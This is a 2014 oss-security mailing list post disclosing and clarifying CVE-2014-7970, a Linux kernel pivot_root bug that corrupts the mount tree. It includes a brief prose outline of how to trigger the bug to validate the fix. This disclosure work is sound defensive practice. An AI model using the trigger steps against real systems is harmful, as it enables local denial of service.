Date: Fri, 17 Oct 2014 17:32:13 -0700 From: Andy Lutomirski <luto@...capital.net> To: oss-security@...ts.openwall.com Subject: Re: CVE-2014-7970: Linux VFS denial of service On 10/08/2014 12:48 PM, Andy Lutomirski wrote: > pivot_root has a bug. Exploiting it at all is tricky, but it can be > done. I'm reasonably confident that this is just denial of service. > (There's also probably an information disclosure in there, but I think > that it's only available to root, so it's not a big deal.) > > I'm posting this a little bit early, since a patch is publicly > available, the impact is low, and hitting the bad code path at all is > quite tedious. I'll send a proof of concept later on. > > Distros: if you need a test case to validate the fix, let me know. > Although, for validation, it should be sufficient to just chroot > somewhere as root, escape the chroot (while still chrooted), and then > pivot_root(".", ".") on a mountpoint. > > Candidate patch here: > > http://news.gmane.org/find-root.php?message_id=87bnpmihks.fsf%40x220.int.ebiederm.org > The mitre.org description is: The pivot_root implementation in fs/namespace.c in the Linux kernel through 3.17 does not properly interact with certain locations of a chroot directory, which allows local users to cause a denial of service (mount-tree loop) via . (dot) values in both arguments to the pivot_root system call. This is a bit misleading. Passing "." to both arguments of the pivot_root system call is a perfectly fine (albeit brain-bending) thing to do. The bug was that, if either argument to pivot_root referred to a directory outside of the calling processes's chroot, then pivot_root would malfunction, corrupting the mount tree. --Andy
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Powered by Openwall GNU/*/Linux - Powered by OpenVZ